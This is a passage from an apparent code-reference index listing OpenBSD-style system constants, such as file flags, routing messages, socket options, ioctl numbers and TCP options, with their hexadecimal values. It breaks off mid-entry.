NET_RT_SOURCE (line 1095) | NET_RT_SOURCE = 0x7 constant NET_RT_STATS (line 1096) | NET_RT_STATS = 0x4 constant NET_RT_TABLE (line 1097) | NET_RT_TABLE = 0x5 constant NFDBITS (line 1098) | NFDBITS = 0x20 constant NOFLSH (line 1099) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1100) | NOKERNINFO = 0x2000000 constant NOTE_ATTRIB (line 1101) | NOTE_ATTRIB = 0x8 constant NOTE_CHANGE (line 1102) | NOTE_CHANGE = 0x1 constant NOTE_CHILD (line 1103) | NOTE_CHILD = 0x4 constant NOTE_DELETE (line 1104) | NOTE_DELETE = 0x1 constant NOTE_EOF (line 1105) | NOTE_EOF = 0x2 constant NOTE_EXEC (line 1106) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1107) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1108) | NOTE_EXTEND = 0x4 constant NOTE_FORK (line 1109) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1110) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1111) | NOTE_LOWAT = 0x1 constant NOTE_OOB (line 1112) | NOTE_OOB = 0x4 constant NOTE_PCTRLMASK (line 1113) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1114) | NOTE_PDATAMASK = 0xfffff constant NOTE_RENAME (line 1115) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1116) | NOTE_REVOKE = 0x40 constant NOTE_TRACK (line 1117) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1118) | NOTE_TRACKERR = 0x2 constant NOTE_TRUNCATE (line 1119) | NOTE_TRUNCATE = 0x80 constant NOTE_WRITE (line 1120) | NOTE_WRITE = 0x2 constant OCRNL (line 1121) | OCRNL = 0x10 constant OLCUC (line 1122) | OLCUC = 0x20 constant ONLCR (line 1123) | ONLCR = 0x2 constant ONLRET (line 1124) | ONLRET = 0x80 constant ONOCR (line 1125) | ONOCR = 0x40 constant ONOEOT (line 1126) | ONOEOT = 0x8 constant OPOST (line 1127) | OPOST = 0x1 constant OXTABS (line 1128) | OXTABS = 0x4 constant O_ACCMODE (line 1129) | O_ACCMODE = 0x3 constant O_APPEND (line 1130) | O_APPEND = 0x8 constant O_ASYNC (line 1131) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1132) | O_CLOEXEC = 0x10000 constant O_CREAT (line 1133) | O_CREAT = 0x200 constant O_DIRECTORY (line 1134) | O_DIRECTORY = 0x20000 constant O_DSYNC (line 1135) | O_DSYNC = 0x80 constant O_EXCL (line 1136) | O_EXCL = 0x800 constant O_EXLOCK (line 1137) | O_EXLOCK = 0x20 constant O_FSYNC (line 1138) | O_FSYNC = 0x80 constant O_NDELAY (line 1139) | O_NDELAY = 0x4 constant O_NOCTTY (line 1140) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1141) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1142) | O_NONBLOCK = 0x4 constant O_RDONLY (line 1143) | O_RDONLY = 0x0 constant O_RDWR (line 1144) | O_RDWR = 0x2 constant O_RSYNC (line 1145) | O_RSYNC = 0x80 constant O_SHLOCK (line 1146) | O_SHLOCK = 0x10 constant O_SYNC (line 1147) | O_SYNC = 0x80 constant O_TRUNC (line 1148) | O_TRUNC = 0x400 constant O_WRONLY (line 1149) | O_WRONLY = 0x1 constant PARENB (line 1150) | PARENB = 0x1000 constant PARMRK (line 1151) | PARMRK = 0x8 constant PARODD (line 1152) | PARODD = 0x2000 constant PENDIN (line 1153) | PENDIN = 0x20000000 constant PF_FLUSH (line 1154) | PF_FLUSH = 0x1 constant PRIO_PGRP (line 1155) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1156) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1157) | PRIO_USER = 0x2 constant PROT_EXEC (line 1158) | PROT_EXEC = 0x4 constant PROT_NONE (line 1159) | PROT_NONE = 0x0 constant PROT_READ (line 1160) | PROT_READ = 0x1 constant PROT_WRITE (line 1161) | PROT_WRITE = 0x2 constant RLIMIT_CORE (line 1162) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1163) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1164) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1165) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1166) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1167) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1168) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1169) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1170) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1171) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1172) | RTAX_AUTHOR = 0x6 constant RTAX_BFD (line 1173) | RTAX_BFD = 0xb constant RTAX_BRD (line 1174) | RTAX_BRD = 0x7 constant RTAX_DNS (line 1175) | RTAX_DNS = 0xc constant RTAX_DST (line 1176) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1177) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1178) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1179) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1180) | RTAX_IFP = 0x4 constant RTAX_LABEL (line 1181) | RTAX_LABEL = 0xa constant RTAX_MAX (line 1182) | RTAX_MAX = 0xf constant RTAX_NETMASK (line 1183) | RTAX_NETMASK = 0x2 constant RTAX_SEARCH (line 1184) | RTAX_SEARCH = 0xe constant RTAX_SRC (line 1185) | RTAX_SRC = 0x8 constant RTAX_SRCMASK (line 1186) | RTAX_SRCMASK = 0x9 constant RTAX_STATIC (line 1187) | RTAX_STATIC = 0xd constant RTA_AUTHOR (line 1188) | RTA_AUTHOR = 0x40 constant RTA_BFD (line 1189) | RTA_BFD = 0x800 constant RTA_BRD (line 1190) | RTA_BRD = 0x80 constant RTA_DNS (line 1191) | RTA_DNS = 0x1000 constant RTA_DST (line 1192) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1193) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1194) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1195) | RTA_IFA = 0x20 constant RTA_IFP (line 1196) | RTA_IFP = 0x10 constant RTA_LABEL (line 1197) | RTA_LABEL = 0x400 constant RTA_NETMASK (line 1198) | RTA_NETMASK = 0x4 constant RTA_SEARCH (line 1199) | RTA_SEARCH = 0x4000 constant RTA_SRC (line 1200) | RTA_SRC = 0x100 constant RTA_SRCMASK (line 1201) | RTA_SRCMASK = 0x200 constant RTA_STATIC (line 1202) | RTA_STATIC = 0x2000 constant RTF_ANNOUNCE (line 1203) | RTF_ANNOUNCE = 0x4000 constant RTF_BFD (line 1204) | RTF_BFD = 0x1000000 constant RTF_BLACKHOLE (line 1205) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1206) | RTF_BROADCAST = 0x400000 constant RTF_CACHED (line 1207) | RTF_CACHED = 0x20000 constant RTF_CLONED (line 1208) | RTF_CLONED = 0x10000 constant RTF_CLONING (line 1209) | RTF_CLONING = 0x100 constant RTF_CONNECTED (line 1210) | RTF_CONNECTED = 0x800000 constant RTF_DONE (line 1211) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1212) | RTF_DYNAMIC = 0x10 constant RTF_FMASK (line 1213) | RTF_FMASK = 0x110fc08 constant RTF_GATEWAY (line 1214) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 1215) | RTF_HOST = 0x4 constant RTF_LLINFO (line 1216) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 1217) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1218) | RTF_MODIFIED = 0x20 constant RTF_MPATH (line 1219) | RTF_MPATH = 0x40000 constant RTF_MPLS (line 1220) | RTF_MPLS = 0x100000 constant RTF_MULTICAST (line 1221) | RTF_MULTICAST = 0x200 constant RTF_PERMANENT_ARP (line 1222) | RTF_PERMANENT_ARP = 0x2000 constant RTF_PROTO1 (line 1223) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1224) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 1225) | RTF_PROTO3 = 0x2000 constant RTF_REJECT (line 1226) | RTF_REJECT = 0x8 constant RTF_STATIC (line 1227) | RTF_STATIC = 0x800 constant RTF_UP (line 1228) | RTF_UP = 0x1 constant RTF_USETRAILERS (line 1229) | RTF_USETRAILERS = 0x8000 constant RTM_80211INFO (line 1230) | RTM_80211INFO = 0x15 constant RTM_ADD (line 1231) | RTM_ADD = 0x1 constant RTM_BFD (line 1232) | RTM_BFD = 0x12 constant RTM_CHANGE (line 1233) | RTM_CHANGE = 0x3 constant RTM_CHGADDRATTR (line 1234) | RTM_CHGADDRATTR = 0x14 constant RTM_DELADDR (line 1235) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1236) | RTM_DELETE = 0x2 constant RTM_DESYNC (line 1237) | RTM_DESYNC = 0x10 constant RTM_GET (line 1238) | RTM_GET = 0x4 constant RTM_IFANNOUNCE (line 1239) | RTM_IFANNOUNCE = 0xf constant RTM_IFINFO (line 1240) | RTM_IFINFO = 0xe constant RTM_INVALIDATE (line 1241) | RTM_INVALIDATE = 0x11 constant RTM_LOSING (line 1242) | RTM_LOSING = 0x5 constant RTM_MAXSIZE (line 1243) | RTM_MAXSIZE = 0x800 constant RTM_MISS (line 1244) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1245) | RTM_NEWADDR = 0xc constant RTM_PROPOSAL (line 1246) | RTM_PROPOSAL = 0x13 constant RTM_REDIRECT (line 1247) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1248) | RTM_RESOLVE = 0xb constant RTM_SOURCE (line 1249) | RTM_SOURCE = 0x16 constant RTM_VERSION (line 1250) | RTM_VERSION = 0x5 constant RTV_EXPIRE (line 1251) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1252) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1253) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1254) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1255) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1256) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1257) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1258) | RTV_SSTHRESH = 0x20 constant RT_TABLEID_BITS (line 1259) | RT_TABLEID_BITS = 0x8 constant RT_TABLEID_MASK (line 1260) | RT_TABLEID_MASK = 0xff constant RT_TABLEID_MAX (line 1261) | RT_TABLEID_MAX = 0xff constant RUSAGE_CHILDREN (line 1262) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1263) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 1264) | RUSAGE_THREAD = 0x1 constant SCM_RIGHTS (line 1265) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1266) | SCM_TIMESTAMP = 0x4 constant SEEK_CUR (line 1267) | SEEK_CUR = 0x1 constant SEEK_END (line 1268) | SEEK_END = 0x2 constant SEEK_SET (line 1269) | SEEK_SET = 0x0 constant SHUT_RD (line 1270) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1271) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1272) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1273) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1274) | SIOCAIFADDR = 0x8040691a constant SIOCAIFGROUP (line 1275) | SIOCAIFGROUP = 0x80286987 constant SIOCATMARK (line 1276) | SIOCATMARK = 0x40047307 constant SIOCBRDGADD (line 1277) | SIOCBRDGADD = 0x8060693c constant SIOCBRDGADDL (line 1278) | SIOCBRDGADDL = 0x80606949 constant SIOCBRDGADDS (line 1279) | SIOCBRDGADDS = 0x80606941 constant SIOCBRDGARL (line 1280) | SIOCBRDGARL = 0x808c694d constant SIOCBRDGDADDR (line 1281) | SIOCBRDGDADDR = 0x81286947 constant SIOCBRDGDEL (line 1282) | SIOCBRDGDEL = 0x8060693d constant SIOCBRDGDELS (line 1283) | SIOCBRDGDELS = 0x80606942 constant SIOCBRDGFLUSH (line 1284) | SIOCBRDGFLUSH = 0x80606948 constant SIOCBRDGFRL (line 1285) | SIOCBRDGFRL = 0x808c694e constant SIOCBRDGGCACHE (line 1286) | SIOCBRDGGCACHE = 0xc0146941 constant SIOCBRDGGFD (line 1287) | SIOCBRDGGFD = 0xc0146952 constant SIOCBRDGGHT (line 1288) | SIOCBRDGGHT = 0xc0146951 constant SIOCBRDGGIFFLGS (line 1289) | SIOCBRDGGIFFLGS = 0xc060693e constant SIOCBRDGGMA (line 1290) | SIOCBRDGGMA = 0xc0146953 constant SIOCBRDGGPARAM (line 1291) | SIOCBRDGGPARAM = 0xc0406958 constant SIOCBRDGGPRI (line 1292) | SIOCBRDGGPRI = 0xc0146950 constant SIOCBRDGGRL (line 1293) | SIOCBRDGGRL = 0xc030694f constant SIOCBRDGGTO (line 1294) | SIOCBRDGGTO = 0xc0146946 constant SIOCBRDGIFS (line 1295) | SIOCBRDGIFS = 0xc0606942 constant SIOCBRDGRTS (line 1296) | SIOCBRDGRTS = 0xc0206943 constant SIOCBRDGSADDR (line 1297) | SIOCBRDGSADDR = 0xc1286944 constant SIOCBRDGSCACHE (line 1298) | SIOCBRDGSCACHE = 0x80146940 constant SIOCBRDGSFD (line 1299) | SIOCBRDGSFD = 0x80146952 constant SIOCBRDGSHT (line 1300) | SIOCBRDGSHT = 0x80146951 constant SIOCBRDGSIFCOST (line 1301) | SIOCBRDGSIFCOST = 0x80606955 constant SIOCBRDGSIFFLGS (line 1302) | SIOCBRDGSIFFLGS = 0x8060693f constant SIOCBRDGSIFPRIO (line 1303) | SIOCBRDGSIFPRIO = 0x80606954 constant SIOCBRDGSIFPROT (line 1304) | SIOCBRDGSIFPROT = 0x8060694a constant SIOCBRDGSMA (line 1305) | SIOCBRDGSMA = 0x80146953 constant SIOCBRDGSPRI (line 1306) | SIOCBRDGSPRI = 0x80146950 constant SIOCBRDGSPROTO (line 1307) | SIOCBRDGSPROTO = 0x8014695a constant SIOCBRDGSTO (line 1308) | SIOCBRDGSTO = 0x80146945 constant SIOCBRDGSTXHC (line 1309) | SIOCBRDGSTXHC = 0x80146959 constant SIOCDELLABEL (line 1310) | SIOCDELLABEL = 0x80206997 constant SIOCDELMULTI (line 1311) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1312) | SIOCDIFADDR = 0x80206919 constant SIOCDIFGROUP (line 1313) | SIOCDIFGROUP = 0x80286989 constant SIOCDIFPARENT (line 1314) | SIOCDIFPARENT = 0x802069b4 constant SIOCDIFPHYADDR (line 1315) | SIOCDIFPHYADDR = 0x80206949 constant SIOCDPWE3NEIGHBOR (line 1316) | SIOCDPWE3NEIGHBOR = 0x802069de constant SIOCDVNETID (line 1317) | SIOCDVNETID = 0x802069af constant SIOCGETKALIVE (line 1318) | SIOCGETKALIVE = 0xc01869a4 constant SIOCGETLABEL (line 1319) | SIOCGETLABEL = 0x8020699a constant SIOCGETMPWCFG (line 1320) | SIOCGETMPWCFG = 0xc02069ae constant SIOCGETPFLOW (line 1321) | SIOCGETPFLOW = 0xc02069fe constant SIOCGETPFSYNC (line 1322) | SIOCGETPFSYNC = 0xc02069f8 constant SIOCGETSGCNT (line 1323) | SIOCGETSGCNT = 0xc0207534 constant SIOCGETVIFCNT (line 1324) | SIOCGETVIFCNT = 0xc0287533 constant SIOCGETVLAN (line 1325) | SIOCGETVLAN = 0xc0206990 constant SIOCGIFADDR (line 1326) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFBRDADDR (line 1327) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCONF (line 1328) | SIOCGIFCONF = 0xc0106924 constant SIOCGIFDATA (line 1329) | SIOCGIFDATA = 0xc020691b constant SIOCGIFDESCR (line 1330) | SIOCGIFDESCR = 0xc0206981 constant SIOCGIFDSTADDR (line 1331) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFLAGS (line 1332) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFGATTR (line 1333) | SIOCGIFGATTR = 0xc028698b constant SIOCGIFGENERIC (line 1334) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFGLIST (line 1335) | SIOCGIFGLIST = 0xc028698d constant SIOCGIFGMEMB (line 1336) | SIOCGIFGMEMB = 0xc028698a constant SIOCGIFGROUP (line 1337) | SIOCGIFGROUP = 0xc0286988 constant SIOCGIFHARDMTU (line 1338) | SIOCGIFHARDMTU = 0xc02069a5 constant SIOCGIFLLPRIO (line 1339) | SIOCGIFLLPRIO = 0xc02069b6 constant SIOCGIFMEDIA (line 1340) | SIOCGIFMEDIA = 0xc0406938 constant SIOCGIFMETRIC (line 1341) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1342) | SIOCGIFMTU = 0xc020697e constant SIOCGIFNETMASK (line 1343) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPAIR (line 1344) | SIOCGIFPAIR = 0xc02069b1 constant SIOCGIFPARENT (line 1345) | SIOCGIFPARENT = 0xc02069b3 constant SIOCGIFPRIORITY (line 1346) | SIOCGIFPRIORITY = 0xc020699c constant SIOCGIFRDOMAIN (line 1347) | SIOCGIFRDOMAIN = 0xc02069a0 constant SIOCGIFRTLABEL (line 1348) | SIOCGIFRTLABEL = 0xc0206983 constant SIOCGIFRXR (line 1349) | SIOCGIFRXR = 0x802069aa constant SIOCGIFSFFPAGE (line 1350) | SIOCGIFSFFPAGE = 0xc1126939 constant SIOCGIFXFLAGS (line 1351) | SIOCGIFXFLAGS = 0xc020699e constant SIOCGLIFPHYADDR (line 1352) | SIOCGLIFPHYADDR = 0xc218694b constant SIOCGLIFPHYDF (line 1353) | SIOCGLIFPHYDF = 0xc02069c2 constant SIOCGLIFPHYECN (line 1354) | SIOCGLIFPHYECN = 0xc02069c8 constant SIOCGLIFPHYRTABLE (line 1355) | SIOCGLIFPHYRTABLE = 0xc02069a2 constant SIOCGLIFPHYTTL (line 1356) | SIOCGLIFPHYTTL = 0xc02069a9 constant SIOCGPGRP (line 1357) | SIOCGPGRP = 0x40047309 constant SIOCGPWE3 (line 1358) | SIOCGPWE3 = 0xc0206998 constant SIOCGPWE3CTRLWORD (line 1359) | SIOCGPWE3CTRLWORD = 0xc02069dc constant SIOCGPWE3FAT (line 1360) | SIOCGPWE3FAT = 0xc02069dd constant SIOCGPWE3NEIGHBOR (line 1361) | SIOCGPWE3NEIGHBOR = 0xc21869de constant SIOCGRXHPRIO (line 1362) | SIOCGRXHPRIO = 0xc02069db constant SIOCGSPPPPARAMS (line 1363) | SIOCGSPPPPARAMS = 0xc0206994 constant SIOCGTXHPRIO (line 1364) | SIOCGTXHPRIO = 0xc02069c6 constant SIOCGUMBINFO (line 1365) | SIOCGUMBINFO = 0xc02069be constant SIOCGUMBPARAM (line 1366) | SIOCGUMBPARAM = 0xc02069c0 constant SIOCGVH (line 1367) | SIOCGVH = 0xc02069f6 constant SIOCGVNETFLOWID (line 1368) | SIOCGVNETFLOWID = 0xc02069c4 constant SIOCGVNETID (line 1369) | SIOCGVNETID = 0xc02069a7 constant SIOCIFAFATTACH (line 1370) | SIOCIFAFATTACH = 0x801169ab constant SIOCIFAFDETACH (line 1371) | SIOCIFAFDETACH = 0x801169ac constant SIOCIFCREATE (line 1372) | SIOCIFCREATE = 0x8020697a constant SIOCIFDESTROY (line 1373) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1374) | SIOCIFGCLONERS = 0xc0106978 constant SIOCSETKALIVE (line 1375) | SIOCSETKALIVE = 0x801869a3 constant SIOCSETLABEL (line 1376) | SIOCSETLABEL = 0x80206999 constant SIOCSETMPWCFG (line 1377) | SIOCSETMPWCFG = 0x802069ad constant SIOCSETPFLOW (line 1378) | SIOCSETPFLOW = 0x802069fd constant SIOCSETPFSYNC (line 1379) | SIOCSETPFSYNC = 0x802069f7 constant SIOCSETVLAN (line 1380) | SIOCSETVLAN = 0x8020698f constant SIOCSIFADDR (line 1381) | SIOCSIFADDR = 0x8020690c constant SIOCSIFBRDADDR (line 1382) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFDESCR (line 1383) | SIOCSIFDESCR = 0x80206980 constant SIOCSIFDSTADDR (line 1384) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFLAGS (line 1385) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGATTR (line 1386) | SIOCSIFGATTR = 0x8028698c constant SIOCSIFGENERIC (line 1387) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFLLADDR (line 1388) | SIOCSIFLLADDR = 0x8020691f constant SIOCSIFLLPRIO (line 1389) | SIOCSIFLLPRIO = 0x802069b5 constant SIOCSIFMEDIA (line 1390) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1391) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1392) | SIOCSIFMTU = 0x8020697f constant SIOCSIFNETMASK (line 1393) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPAIR (line 1394) | SIOCSIFPAIR = 0x802069b0 constant SIOCSIFPARENT (line 1395) | SIOCSIFPARENT = 0x802069b2 constant SIOCSIFPRIORITY (line 1396) | SIOCSIFPRIORITY = 0x8020699b constant SIOCSIFRDOMAIN (line 1397) | SIOCSIFRDOMAIN = 0x8020699f constant SIOCSIFRTLABEL (line 1398) | SIOCSIFRTLABEL = 0x80206982 constant SIOCSIFXFLAGS (line 1399) | SIOCSIFXFLAGS = 0x8020699d constant SIOCSLIFPHYADDR (line 1400) | SIOCSLIFPHYADDR = 0x8218694a constant SIOCSLIFPHYDF (line 1401) | SIOCSLIFPHYDF = 0x802069c1 constant SIOCSLIFPHYECN (line 1402) | SIOCSLIFPHYECN = 0x802069c7 constant SIOCSLIFPHYRTABLE (line 1403) | SIOCSLIFPHYRTABLE = 0x802069a1 constant SIOCSLIFPHYTTL (line 1404) | SIOCSLIFPHYTTL = 0x802069a8 constant SIOCSPGRP (line 1405) | SIOCSPGRP = 0x80047308 constant SIOCSPWE3CTRLWORD (line 1406) | SIOCSPWE3CTRLWORD = 0x802069dc constant SIOCSPWE3FAT (line 1407) | SIOCSPWE3FAT = 0x802069dd constant SIOCSPWE3NEIGHBOR (line 1408) | SIOCSPWE3NEIGHBOR = 0x821869de constant SIOCSRXHPRIO (line 1409) | SIOCSRXHPRIO = 0x802069db constant SIOCSSPPPPARAMS (line 1410) | SIOCSSPPPPARAMS = 0x80206993 constant SIOCSTXHPRIO (line 1411) | SIOCSTXHPRIO = 0x802069c5 constant SIOCSUMBPARAM (line 1412) | SIOCSUMBPARAM = 0x802069bf constant SIOCSVH (line 1413) | SIOCSVH = 0xc02069f5 constant SIOCSVNETFLOWID (line 1414) | SIOCSVNETFLOWID = 0x802069c3 constant SIOCSVNETID (line 1415) | SIOCSVNETID = 0x802069a6 constant SOCK_CLOEXEC (line 1416) | SOCK_CLOEXEC = 0x8000 constant SOCK_DGRAM (line 1417) | SOCK_DGRAM = 0x2 constant SOCK_DNS (line 1418) | SOCK_DNS = 0x1000 constant SOCK_NONBLOCK (line 1419) | SOCK_NONBLOCK = 0x4000 constant SOCK_RAW (line 1420) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1421) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1422) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1423) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 1424) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1425) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1426) | SO_ACCEPTCONN = 0x2 constant SO_BINDANY (line 1427) | SO_BINDANY = 0x1000 constant SO_BROADCAST (line 1428) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1429) | SO_DEBUG = 0x1 constant SO_DOMAIN (line 1430) | SO_DOMAIN = 0x1024 constant SO_DONTROUTE (line 1431) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1432) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1433) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 1434) | SO_LINGER = 0x80 constant SO_NETPROC (line 1435) | SO_NETPROC = 0x1020 constant SO_OOBINLINE (line 1436) | SO_OOBINLINE = 0x100 constant SO_PEERCRED (line 1437) | SO_PEERCRED = 0x1022 constant SO_PROTOCOL (line 1438) | SO_PROTOCOL = 0x1025 constant SO_RCVBUF (line 1439) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1440) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1441) | SO_RCVTIMEO = 0x1006 constant SO_REUSEADDR (line 1442) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1443) | SO_REUSEPORT = 0x200 constant SO_RTABLE (line 1444) | SO_RTABLE = 0x1021 constant SO_SNDBUF (line 1445) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1446) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1447) | SO_SNDTIMEO = 0x1005 constant SO_SPLICE (line 1448) | SO_SPLICE = 0x1023 constant SO_TIMESTAMP (line 1449) | SO_TIMESTAMP = 0x800 constant SO_TYPE (line 1450) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1451) | SO_USELOOPBACK = 0x40 constant SO_ZEROIZE (line 1452) | SO_ZEROIZE = 0x2000 constant S_BLKSIZE (line 1453) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1454) | S_IEXEC = 0x40 constant S_IFBLK (line 1455) | S_IFBLK = 0x6000 constant S_IFCHR (line 1456) | S_IFCHR = 0x2000 constant S_IFDIR (line 1457) | S_IFDIR = 0x4000 constant S_IFIFO (line 1458) | S_IFIFO = 0x1000 constant S_IFLNK (line 1459) | S_IFLNK = 0xa000 constant S_IFMT (line 1460) | S_IFMT = 0xf000 constant S_IFREG (line 1461) | S_IFREG = 0x8000 constant S_IFSOCK (line 1462) | S_IFSOCK = 0xc000 constant S_IREAD (line 1463) | S_IREAD = 0x100 constant S_IRGRP (line 1464) | S_IRGRP = 0x20 constant S_IROTH (line 1465) | S_IROTH = 0x4 constant S_IRUSR (line 1466) | S_IRUSR = 0x100 constant S_IRWXG (line 1467) | S_IRWXG = 0x38 constant S_IRWXO (line 1468) | S_IRWXO = 0x7 constant S_IRWXU (line 1469) | S_IRWXU = 0x1c0 constant S_ISGID (line 1470) | S_ISGID = 0x400 constant S_ISTXT (line 1471) | S_ISTXT = 0x200 constant S_ISUID (line 1472) | S_ISUID = 0x800 constant S_ISVTX (line 1473) | S_ISVTX = 0x200 constant S_IWGRP (line 1474) | S_IWGRP = 0x10 constant S_IWOTH (line 1475) | S_IWOTH = 0x2 constant S_IWRITE (line 1476) | S_IWRITE = 0x80 constant S_IWUSR (line 1477) | S_IWUSR = 0x80 constant S_IXGRP (line 1478) | S_IXGRP = 0x8 constant S_IXOTH (line 1479) | S_IXOTH = 0x1 constant S_IXUSR (line 1480) | S_IXUSR = 0x40 constant TCIFLUSH (line 1481) | TCIFLUSH = 0x1 constant TCIOFF (line 1482) | TCIOFF = 0x3 constant TCIOFLUSH (line 1483) | TCIOFLUSH = 0x3 constant TCION (line 1484) | TCION = 0x4 constant TCOFLUSH (line 1485) | TCOFLUSH = 0x2 constant TCOOFF (line 1486) | TCOOFF = 0x1 constant TCOON (line 1487) | TCOON = 0x2 constant TCPOPT_EOL (line 1488) | TCPOPT_EOL = 0x0 constant TCPOPT_MAXSEG (line 1489) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 1490) | TCPOPT_NOP = 0x1 constant TCPOPT_SACK (line 1491) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_HDR (line 1492) | TCPOPT_SACK_HDR = 0x1010500 constant TCPOPT_SACK_PERMITTED (line 1493) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_SACK_PERMIT_HDR (line 1494) | TCPOPT_SACK_PERMIT_HDR = 0x1010402 constant TCPOPT_SIGNATURE (line 1495) | TCPOPT_SIGNATURE = 0x13 constant TCPOPT_TIMESTAMP (line 1496) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_TSTAMP_HDR (line 1497) | TCPOPT_TSTAMP_HDR = 0x101080a constant TCPOPT_WINDOW (line 1498) | TCPOPT_WINDOW = 0x3 constant TCP_INFO (line 1499) | TCP_INFO = 0x9 constant TCP_MAXSEG (line 1500) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1501) | TCP_MAXWIN = 0xffff constant TCP_MAX_SACK (line 1502) | TCP_MAX_SACK = 0x3 constant TCP_MAX_WINSHIFT (line 1503) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1504) | TCP_MD5SIG = 0x4 constant TCP_MSS (line 1505) | TCP_MSS = 0x200 constant TCP_NODELAY (line 1506) | TCP_NODELAY = 0x1 constant TCP_NOPUSH (line 1507) | TCP_NOPUSH = 0x10 constant TCP_SACKHOLE_LIMIT (line 1508) | TCP_SACKHOLE_LIMIT = 0x80 constant TCP_SACK_ENABLE (line 1509) | TCP_SACK_ENABLE = 0x8 constant TCSAFLUSH (line 1510) | TCSAFLUSH = 0x2 constant TIMER_ABSTIME (line 1511) | TIMER_ABSTIME = 0x1 constant TIMER_RELTIME (line 1512) | TIMER_RELTIME = 0x0 constant TIOCCBRK (line 1513) | TIOCCBRK = 